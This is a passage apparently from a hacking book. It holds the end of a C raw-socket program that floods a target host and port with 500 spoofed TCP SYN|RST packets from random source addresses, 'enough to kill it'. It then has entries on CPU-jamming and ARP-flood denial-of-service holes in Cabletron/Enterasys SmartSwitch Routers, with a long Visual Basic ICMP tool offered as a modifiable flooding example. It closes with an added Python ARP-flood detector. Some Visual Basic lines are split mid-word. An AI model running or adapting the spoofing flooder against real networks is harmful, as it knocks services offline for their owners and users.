  return (addr);
}

/* port number from a numeric string or a services(5) name */
unsigned short
lookup_port (char *p)
{
  int i;
  struct servent *s;

  if ((i = atoi (p)) == 0)
    {
      if ((s = getservbyname (p, "tcp")) == NULL)
        errors ("Unknown port %s\n", p);
      i = ntohs (s->s_port);
    }
  return ((unsigned short) i);
}

/* build and send one spoofed TCP segment from local to remote; sequence and
   acknum are accepted but ignored, the tool randomizes those fields itself */
void
spoof_packet (struct sockaddr_in local, int fromport,
              struct sockaddr_in remote, int toport, u_long sequence,
              int sock, u_char theflag, u_long acknum,
              char *packdata, int datalen)
{
  char *packet;
  int tempint;

  if (datalen > 0)
    datalen++;                          /* room for the trailing '\r' */
  packet = (char *) malloc (psize + datalen);
  tempint = toport;
  toport = fromport;
  fromport = tempint;
  {
    struct tcphdr *fake_tcp;
    fake_tcp = (struct tcphdr *) (packet + tcp_offset);
    fake_tcp->th_dport = htons (fromport);
    fake_tcp->th_sport = htons (toport);
    fake_tcp->th_flags = theflag;
    fake_tcp->th_seq = random ();
    fake_tcp->th_ack = random ();
    /* this is what really matters, else however we randomize everything
       to prevent simple rule based filters */
    fake_tcp->th_off = random ();
    fake_tcp->th_win = random ();
    fake_tcp->th_urp = random ();
  }
  if (datalen > 0)
    {
      char *tempbuf;
      tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
      for (tempint = 0; tempint < datalen - 1; tempint++)
        *tempbuf++ = *packdata++;
      *tempbuf = '\r';
    }
  {
    struct iphdr *real_ip;
    real_ip = (struct iphdr *) packet;
    real_ip->version = 4;
    real_ip->ihl = 5;
    real_ip->tot_len = htons (psize + datalen);
    real_ip->tos = 0;
    real_ip->ttl = 64;
    real_ip->protocol = 6;
    real_ip->check = 0;
    real_ip->id = 10786;
    real_ip->frag_off = 0;
    bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
    bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
    /* the copies above land in the opposite fields; swap them back so the
       segment goes from local (spoofed) to remote (the target) */
    temp_ip.saddr = htonl (ntohl (real_ip->daddr));
    real_ip->daddr = htonl (ntohl (real_ip->saddr));
    real_ip->saddr = temp_ip.saddr;
    real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
    {
      struct tcphdr *another_tcp;
      another_tcp = (struct tcphdr *) (packet + tcp_offset);
      another_tcp->th_sum = 0;
      another_tcp->th_sum = compute_tcp_checksum (another_tcp,
                                                  sizeof (struct tcphdr) + datalen,
                                                  real_ip->saddr, real_ip->daddr);
    }
  }
  {
    int result;
    sock = (int) temp_socket;
    result = sendto (sock, packet, psize + datalen, 0,
                     (struct sockaddr *) &remote, sizeof (remote));
    if (result == -1)
      perror ("sendto");
  }
  free (packet);
}

int
main (int argc, char **argv)
{
  unsigned int daddr;
  unsigned short dport;
  struct sockaddr_in sin;
  int s, i;

  if (argc != 3)
    errors ("Usage: %s <host> <port>\n", argv[0]);
  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(daddr = lookup (argv[1])))
    err ("Unable to lookup destination address.\n");
  dport = lookup_port (argv[2]);
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = daddr;
  sin.sin_port = dport;
  fixhost (&local, argv[1]);
  fixhost (&remote, argv[1]);
  srandom ((unsigned) time (NULL));
  /* 500 seems to be enough to kill it */
  for (i = 0; i < 500; i++)
    {
      start_seq++;
      local.sin_addr.s_addr = random ();        /* random spoofed source */
      /* the argument list is cut off after TH_RST in the printed listing; it
         is completed here with no acknowledgement number and no payload */
      spoof_packet (local, random (), remote, dport, start_seq, s,
                    TH_SYN | TH_RST, 0, NULL, 0);
    }
  return 0;
}
Cabletron/Enterasys
The products offered through Cabletron/Enterasys (www.enterasys.com) provide high-speed, high-performance network access from the desktop to the data center. A serious rival to Cisco, this product line leads with the SmartSwitch router family, found in more and more enterprise backbones and WAN gateways. These products are designed to provide the reliability and scalability demanded by today's enterprise networks, with four key benefits: wire-speed routing at gigabit speeds, pinpoint control over application usage, simplified management, and full-featured security.
Liabilities
CPU Jamming
Synopsis: SmartSwitch Router (SSR) product series are vulnerable to CPU flooding.
Hack State: Processing interference with flooding.
Vulnerabilities: SmartSwitch Router (SSR) series.
Breach: Hackers can flood the SSR's CPU simply by sending a large volume of packets with TTL=0 and a destination IP address of all zeros (0.0.0.0) through it. As explained earlier in this book, the time-to-live (TTL) field in an IP header defines how many hops a packet can travel before being dropped; packets like these cannot be forwarded by the switching hardware and are handed to the router's CPU instead, so a steady stream of them keeps the CPU busy. A modifiable coding example of this technique, originally inspired by security enthusiast and programmer Jim Huff, is provided in the following code and in Figure 9.3.
Icmpfld.bas
Dim iReturn As Long, sLowByte As String, sHighByte As String Dim sMsg As String, HostLen As Long, Host As String
Dim Hostent As Hostent, PointerToPointer As Long, ListAddress As Lo ng
Dim WSAdata As WSAdata, DotA As Long, DotAddr As String, ListAddr A s Long
Dim MaxUDP As Long, MaxSockets As Long, i As Integer Dim description As String, Status As String
Dim bReturn As Boolean, hIP As Long
Dim szBuffer As String
Dim Addr As Long
Dim RCode As String
Dim RespondingHost As String
Dim TraceRT As Boolean
Dim TTL As Integer
Const WS_VERSION_MAJOR = &H101 \ &H100 And &HFF& Const WS_VERSION_MINOR = &H101 And &HFF& Const MIN_SOCKETS_REQD = 0
Sub vbIcmpCloseHandle()
bReturn = IcmpCloseHandle(hIP)
If bReturn = False Then
MsgBox "ICMP Closed with Error", vbOKOnly, "VB4032-
ICMPEcho" End If
End Sub
Sub GetRCode()
If pIPe.Status = 0 Then
Text3.Text = Text3.Text + " Reply from " + RespondingH
ost +
": Bytes = " + Trim$(CStr(pIPe.DataSize)) + " RTT = " + Trim$(CStr(pIPe.RoundTripTime)) + "ms TTL = " + Trim$(CStr(pIPe.Options.TTL)) + Chr$(13) + Chr$(10) Else
Text3.Text = Text3.Text + " Reply from " + RespondingH
ost +
": " + RCode + Chr$(13) + Chr$(10) End If
Else
If TTL -
1 < 10 Then Text3.Text = Text3.Text + " Hop # 0" + CStr(TTL -
1) Else Text3.Text = Text3.Text + " Hop # " + CStr(TTL - 1)
Text3.Text = Text3.Text + " " + RespondingHost + Chr$(13)
+
Chr$(10) End If End Sub
Function HiByte(ByVal wParam As Integer) HiByte = wParam \ &H100 And &HFF&
End Function
Function LoByte(ByVal wParam As Integer)
LoByte = wParam And &HFF& End Function
Sub vbGetHostByName()
Dim szString As String
Host = Trim$(Text1.Text) ' Set Variable Host to V
alue
in Text1.text
szString = String(64, &H0)
Host = Host + Right$(szString, 64 - Len(Host))
If gethostbyname(Host) = SOCKET_ERROR Then ' If WS
ock32
error, then tell me about it
sMsg = "Winsock Error" & Str$(WSAGetLastError()) 'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
Else
PointerToPointer = gethostbyname(Host) ' Get t
he
pointer to the address of the winsock hostent structure CopyMemory Hostent.h_name, ByVal _
PointerToPointer, Len(Hostent) ' Copy
Winsock structure to the VisualBasic structure
ListAddress = Hostent.h_addr_list ' Get t
he
ListAddress of the Address List
CopyMemory ListAddr, ByVal ListAddress, 4 ' Copy
Winsock structure to the VisualBasic structure
CopyMemory IPLong, ByVal ListAddr, 4 ' Get t
he
first list entry from the Address List
CopyMemory Addr, ByVal ListAddr, 4
Label3.Caption = Trim$(CStr(Asc(IPLong.Byte4)) + "." + CStr(Asc(IPLong.Byte3)) _
+ "." +
CStr(Asc(IPLong.Byte2)) + "." + CStr(Asc(IPLong.Byte1))) End If End Sub
Sub vbGetHostName()
    Host = String(64, &H0)                          ' Fill Host with 64 null characters
    If gethostname(Host, HostLen) = SOCKET_ERROR Then   ' This routine is where we get the host's name
        sMsg = "WSock32 Error" & Str$(WSAGetLastError())    ' If WSock32 error, then tell me about it
        'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
    Else
        Host = Left$(Trim$(Host), Len(Trim$(Host)) - 1)     ' Trim up the results
        Text1.Text = Host                           ' Display the host's name in Text1
    End If
End Sub
Sub vbIcmpCreateFile()
    hIP = IcmpCreateFile()
    If hIP = 0 Then
        MsgBox "Unable to Create File Handle", vbOKOnly, "VBPing32"
    End If
End Sub
Sub vbIcmpSendEcho()
    Dim NbrOfPkts As Integer
    ' 128 bytes of payload; it is cut down to the requested size below
    szBuffer = "abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvw" & _
               "abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklm"
    If IsNumeric(Text5.Text) Then
        If Val(Text5.Text) < 32 Then Text5.Text = "32"
        If Val(Text5.Text) > 128 Then Text5.Text = "128"
    Else
        Text5.Text = "32"
    End If
    szBuffer = Left$(szBuffer, Val(Text5.Text))
    If IsNumeric(Text4.Text) Then
        If Val(Text4.Text) < 1 Then Text4.Text = "1"
    Else
        Text4.Text = "1"
    End If
    If TraceRT = True Then Text4.Text = "1"
    For NbrOfPkts = 1 To Trim$(Text4.Text)
        DoEvents
        bReturn = IcmpSendEcho(hIP, Addr, szBuffer, Len(szBuffer), pIPo, pIPe, Len(pIPe) + 8, 2700)
        If bReturn Then
            RespondingHost = CStr(pIPe.Address(0)) + "." + CStr(pIPe.Address(1)) + "." + CStr(pIPe.Address(2)) + "." + CStr(pIPe.Address(3))
            GetRCode
        Else
            ' I hate it when this happens. If I get an ICMP timeout
            ' during a TRACERT, try again.
            If TraceRT Then
                TTL = TTL - 1
            Else    ' Don't worry about trying again on a PING, just timeout
                Text3.Text = Text3.Text + "ICMP Request Timeout" + Chr$(13) + Chr$(10)
            End If
        End If
    Next NbrOfPkts
End Sub
Sub vbWSACleanup()
    ' Subroutine to perform WSACleanup
    iReturn = WSACleanup()
    If iReturn <> 0 Then    ' If WSock32 error, then tell me about it.
        sMsg = "WSock32 Error -" & Trim$(Str$(iReturn)) & " occurred in Cleanup"
        MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
        End
    End If
End Sub
Sub vbWSAStartup()
    iReturn = WSAStartup(&H101, WSAdata)
    If iReturn <> 0 Then    ' If WSock32 error, then tell me about it
        MsgBox "WSock32.dll is not responding!", vbOKOnly, "VB4032-ICMPEcho"
    End If
    ' wVersion holds the major version in the low byte and the minor version in the high byte
    If LoByte(WSAdata.wVersion) < WS_VERSION_MAJOR Or (LoByte(WSAdata.wVersion) = WS_VERSION_MAJOR And HiByte(WSAdata.wVersion) < WS_VERSION_MINOR) Then
        sHighByte = Trim$(Str$(HiByte(WSAdata.wVersion)))
        sLowByte = Trim$(Str$(LoByte(WSAdata.wVersion)))
        sMsg = "WinSock Version " & sLowByte & "." & sHighByte
        sMsg = sMsg & " is not supported "
        MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
        End
    End If
    If WSAdata.iMaxSockets < MIN_SOCKETS_REQD Then
        sMsg = "This application requires a minimum of "
        sMsg = sMsg & Trim$(Str$(MIN_SOCKETS_REQD)) & " supported sockets."
        MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
        End
    End If
    ' The Winsock fields are unsigned 16-bit; undo the sign VB's Integer gives them
    MaxSockets = WSAdata.iMaxSockets
    If MaxSockets < 0 Then
        MaxSockets = 65536 + MaxSockets
    End If
    MaxUDP = WSAdata.iMaxUdpDg
    If MaxUDP < 0 Then
        MaxUDP = 65536 + MaxUDP
    End If
    description = ""
    For i = 0 To WSADESCRIPTION_LEN
        If WSAdata.szDescription(i) = 0 Then Exit For
        description = description + Chr$(WSAdata.szDescription(i))
    Next i
    Status = ""
    For i = 0 To WSASYS_STATUS_LEN
        If WSAdata.szSystemStatus(i) = 0 Then Exit For
        Status = Status + Chr$(WSAdata.szSystemStatus(i))
    Next i
End Sub
Private Sub Command1_Click() Text3.Text = ""
vbWSAStartup ' Initialize Winsock
If Len(Text1.Text) = 0 Then
vbGetHostName
End If
If Text1.Text = "" Then
MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"
' Complain if No Host Name Identified
vbWSACleanup Exit Sub End If
vbGetHostByName ' Get the IPAddress for the Host
vbIcmpCreateFile ' Get ICMP Handle
' The following determines the TTL of the ICMPEcho
If IsNumeric(Text2.Text) Then
If (Val(Text2.Text) > 255) Then Text2.Text = "255" If (Val(Text2.Text) < 2) Then Text2.Text = "2"
Else
Text2.Text = "255" End If
pIPo.TTL = Trim$(Text2.Text)
vbIcmpSendEcho ' Send the ICMP Echo Request
vbIcmpCloseHandle ' Close the ICMP Handle
vbWSACleanup ' Close Winsock
End Sub
Private Sub Command2_Click()
    Text3.Text = ""
End Sub
Private Sub Command3_Click()
    Text3.Text = ""
    vbWSAStartup            ' Initialize Winsock
    If Len(Text1.Text) = 0 Then
        vbGetHostName
    End If
    If Text1.Text = "" Then
        MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"   ' Complain if no host name identified
        vbWSACleanup
        Exit Sub
    End If
    vbGetHostByName         ' Get the IPAddress for the Host
    vbIcmpCreateFile        ' Get ICMP Handle
    ' The following determines the TTL of the ICMPEcho for the TRACE function
    TraceRT = True
    Text3.Text = Text3.Text + "Tracing Route to " + Label3.Caption + Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)
    ' Step the TTL up one hop at a time until the target itself answers
    For TTL = 2 To 255
        pIPo.TTL = TTL
        vbIcmpSendEcho      ' Send the ICMP Echo Request
        DoEvents
        If RespondingHost = Label3.Caption Then
            Text3.Text = Text3.Text + Chr$(13) + Chr$(10) + "Route Trace has Completed" + Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)
            Exit For
        End If
    Next TTL
    TraceRT = False         ' Stop TraceRT
    vbIcmpCloseHandle       ' Close the ICMP Handle
    vbWSACleanup            ' Close Winsock
End Sub
ICMP.bas:
Type Inet_address
    Byte4 As String * 1
    Byte3 As String * 1
    Byte2 As String * 1
    Byte1 As String * 1
End Type

Public IPLong As Inet_address

Type WSAdata
    wVersion As Integer
    wHighVersion As Integer
    szDescription(0 To 255) As Byte
    szSystemStatus(0 To 128) As Byte
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Type Hostent
    h_name As Long
    h_aliases As Long
    h_addrtype As Integer
    h_length As Integer
    h_addr_list As Long
End Type

Type IP_OPTION_INFORMATION
    TTL As Byte                     ' Time to Live (used for traceroute)
    Tos As Byte                     ' Type of Service (usually 0)
    Flags As Byte                   ' IP header flags (usually 0)
    OptionsSize As Long             ' Size of Options data (usually 0, max 40)
    OptionsData As String * 128     ' Options data buffer
End Type

Public pIPo As IP_OPTION_INFORMATION

Type IP_ECHO_REPLY
    Address(0 To 3) As Byte         ' Replying address
    Status As Long                  ' Reply status
    RoundTripTime As Long           ' Round trip time in milliseconds
    DataSize As Integer             ' Reply data size
    Reserved As Integer             ' For system use
    data As Long                    ' Pointer to echo data
    Options As IP_OPTION_INFORMATION    ' Reply options
End Type

Public pIPe As IP_ECHO_REPLY

Declare Function gethostname Lib "wsock32.dll" (ByVal hostname$, HostLen&) As Long
Declare Function gethostbyname& Lib "wsock32.dll" (ByVal hostname$)
Declare Function WSAGetLastError Lib "wsock32.dll" () As Long
Declare Function WSAStartup Lib "wsock32.dll" (ByVal wVersionRequired&, lpWSAData As WSAdata) As Long
Declare Function WSACleanup Lib "wsock32.dll" () As Long
Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (hpvDest As Any, hpvSource As Any, ByVal cbCopy As Long)
Declare Function IcmpCreateFile Lib "icmp.dll" () As Long
Declare Function IcmpCloseHandle Lib "icmp.dll" (ByVal HANDLE As Long) As Boolean
Declare Function IcmpSendEcho Lib "ICMP" (ByVal IcmpHandle As Long, ByVal DestAddress As Long, _
    ByVal RequestData As String, ByVal RequestSize As Integer, RequestOptns As IP_OPTION_INFORMATION, _
    ReplyBuffer As IP_ECHO_REPLY, ByVal ReplySize As Long, ByVal TimeOut As Long) As Boolean
Denial-of-Service Attack
Synopsis: There is a DoS vulnerability in the SmartSwitch Router (SSR).
Hack State: Processing interference with flooding.
Vulnerabilities: SSR 8000 running firmware revision 2.x.
Breach: The bottleneck appears to lie in the SSR's ARP-handling mechanism. A flood of ARP requests overwhelms the SSR and causes the router to stop processing. Anonymous attackers crash the SSR by customizing programs like icmp.c (available from the Tiger Tools repository on this book's CD).
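From the defender's side, the flood described above shows up as one sender issuing far more ARP requests per second than any host legitimately needs. The following is an added example, not code from the book or from the router's vendor: a sliding-window rate check over ARP request events; the event records, the one-second window and the threshold of 100 requests are all constructed assumptions.

```python
# Added example (not from the book or the SSR's vendor): a sliding-window
# detector for an ARP request flood. Input records are constructed inline; a
# deployment would feed it ARP requests captured on the router's segment.
from collections import defaultdict, deque

# Constructed ARP request events: (timestamp_ms, sender_mac, target_ip).
# One host resolves a handful of neighbours; a second one sends 600
# requests in about two seconds while sweeping target addresses.
SAMPLE_ARP_REQUESTS = (
    [(i * 500, "00:a0:c9:11:22:33", f"10.0.0.{10 + i}") for i in range(6)]
    + [(1000 + 2 * i, "00:50:56:de:ad:01", f"10.0.0.{i % 254 + 1}")
       for i in range(600)]
)


def detect_arp_flood(events, window_ms=1000, threshold=100):
    """Return {sender_mac: (peak_requests, distinct_targets_at_peak)} for
    every sender that issues more than `threshold` ARP requests inside any
    `window_ms` span. Each sender gets its own deque of (ts, target) pairs
    used as a sliding window, so memory stays bounded by the window size."""
    windows = defaultdict(deque)
    peaks = {}
    for ts, sender, target in sorted(events):
        q = windows[sender]
        q.append((ts, target))
        while q and ts - q[0][0] > window_ms:   # expire events older than the window
            q.popleft()
        if len(q) > threshold:
            prev = peaks.get(sender, (0, 0))
            if len(q) > prev[0]:
                peaks[sender] = (len(q), len({t for _, t in q}))
    return peaks


def format_alerts(peaks, window_ms=1000):
    """Render detections as the log lines an operator would see."""
    return [f"ARP flood: {mac} sent {n} requests to {targets} targets in {window_ms} ms"
            for mac, (n, targets) in sorted(peaks.items())]


if __name__ == "__main__":
    for line in format_alerts(detect_arp_flood(SAMPLE_ARP_REQUESTS)):
        print(line)
```

The flooding sender peaks at 501 requests in a one-second window while the ordinary host never exceeds three, so the threshold separates them with a wide margin.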